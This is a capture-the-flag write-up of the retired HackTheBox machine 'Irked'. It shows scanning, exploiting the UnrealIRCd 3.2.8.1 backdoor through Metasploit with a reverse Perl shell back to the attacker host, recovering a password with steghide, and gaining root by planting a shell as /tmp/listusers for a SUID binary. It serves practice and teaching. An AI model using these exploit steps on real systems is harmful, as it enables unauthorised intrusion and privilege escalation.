HackTheBox: Irked
Doing some retired machines for extra practice. I tried this one two years and got stuck. This time I got it 😀.
Scanning:
Finding running services on common ports:
crazyeights@es-base:~$ sudo nmap -sS 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-01 16:49 EST
Nmap scan report for 10.10.10.117
Host is up (0.040s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
More Thorough Scanning:
More thorough scanning, checking all ports:
crazyeights@es-base:~$ sudo nmap -sV -p- 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-01 16:58 EST
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
34547/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Add the folllowing line to /etc/hosts:
10.10.10.117 irked.htb
Web:
Index Page:
-
Enumerated the server, and found nothing.
-
Downloaded the irked image, searched it for hidden text/files
-
Looks liked there is something in it, but gave up.
IRC:
-
Connect to the IRC service with somesort of client, you will get a banner with the version
-
which is of course: 3.2.8.1 (you could probably just guess this as well)
-
There is a popular vulnerability in that version, with msf:
13 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
-
set RHOSTS to 10.10.10.117
-
set RPORT to 6697
Set the payload:
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.117 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6697 yes The target port (TCP)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
Run the exploit:
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.117:50228) at 2021-01-01 17:19:06 -0500
User:
Spawn an interactive shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$
When enumerating we find the user djmardov:
Listing the contents of his home folder we find the user flag and the file backup
ls -aR
.:
. .bashrc Desktop .gnupg Music .ssh
[SNIP]
./Documents:
. .. .backup user.txt
We do not have permissions to read user.txt, but we can read backup:
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
-
The ‘steg’ of ‘Super elite steg backup pw’ suggests that this a password for something involving stego.
-
Go back to the irked.jpg
Stego:
Extract hidden file from irked.jpg:
crazyeights@es-base:~/Downloads$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".
crazyeights@es-base:~/Downloads$ cat pass.txt
Kab6h+m+bbp2J:HG
Use the password to login to SSH as djmardov:
crazyeights@es-base:~$ ssh djmardov@10.10.10.117
User Flag:
djmardov@irked:~$ cd Documents/
djmardov@irked:~/Documents$ ls
user.txt
djmardov@irked:~/Documents$ cat user.txt
4a66a_i_dont_want_to_get_in_trouble
Root:
Find programs user can run with euid root:
djmardov@irked:~/Documents$ find / -perm /4000 2>/dev/null
[SNIP]
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
-
The program viewuser is non-standard, so might be vulnerable
-
When checking viewuser we see it calls /tmp/listusers which doesn’t exist:
djmardov@irked:~/Documents$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2021-01-01 16:42 (:0)
djmardov pts/1 2021-01-01 17:26 (10.10.14.3)
sh: 1: /tmp/listusers: not found
djmardov@irked:~/Documents$
-
We can create a program listusers that would be called with elevated privileges
-
Insert a shell into the file listusers, and make it executable:
djmardov@irked:~/Documents$ cd /tmp
djmardov@irked:/tmp$ echo /bin/sh > listusers
djmardov@irked:/tmp$ chmod a+x listusers
Run viewuser again:
djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2021-01-01 16:42 (:0)
djmardov pts/1 2021-01-01 17:26 (10.10.14.3)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
#
It calls our program listusers, which gives us a root shell
Root Flag:
# cd /root
# ls
pass.txt root.txt
# cat pass.txt
Kab6h+m+bbp2J:HG
# cat root.txt
8d8e9_i_dont_want_to_get_in_trouble
FIN.